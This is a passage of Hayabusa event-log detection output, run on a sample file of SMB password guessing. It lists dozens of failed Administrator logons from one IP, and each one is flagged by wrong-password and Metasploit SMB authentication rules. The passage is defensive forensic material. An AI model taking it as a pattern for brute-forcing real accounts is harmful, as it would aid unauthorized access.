NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EL0oMweyFgI0MEdM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NJS2dZhWmCGF1Qos : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bNR5dXXnx0LeyNmW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ApUMxqDiqDNo6hrF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o3d1caGukhhBHp6s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oxDVCaWpkSECRoml : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: coqijUGaaVJXY4GV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ATPa6qMbfQ9QDrW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mnQEE00r01jhCNzr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ir9sY7kG6vbOad4z : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: REuk1RZ5eRs3pSbT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 91gfIcAUvKrSAENh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MtrVV1ux0v5w5XWZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rFpyAqPQP77Ls6ir : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nvwp4DimL7SgBmb0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1lnJZDjghQNQxfG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: pBN1g8NBIj6WMrhz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cJMUobtFTwOQTgqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QGZeGqe9rC172BVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zNP99dMvvDQl8WVw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qcwp0odjR0LfM11y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6VjaFCzZr8iUUovn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C3YniJHC0Cswfti0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 63lZpExTzSzNR96C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fKI61MTXJ5x9WF56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhWYNEPWgh03cQSJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: pvZg2LTYtsUhvBhr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BENGUFtNxdPjaS03 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fY1s0OG9JR38H6rm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LblLG1Il6ngkuAOo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PAZ83Onp00vURKSz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxvywmA4UMI04zm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1vH6DSer71gxEDRc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uDNQibannB453BKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 02qkYtCIrOj38agd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: atDwGfxC4RLYYDAF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: fCTUmKwLxkKCoCTn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DBE7Y8yJMNSkJlaK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N7VGVfH05BC7bgaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lP7kC2ayRIEeL5sw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2cQOn41cB2t0ZkSP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PpOyXZwlcCw63tWP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7R8yD7A0lCU16Z0t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: frasd7f8On0O7B6k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtOqqV6rkCIZPPFG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lnwn4dc1lKABRKxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
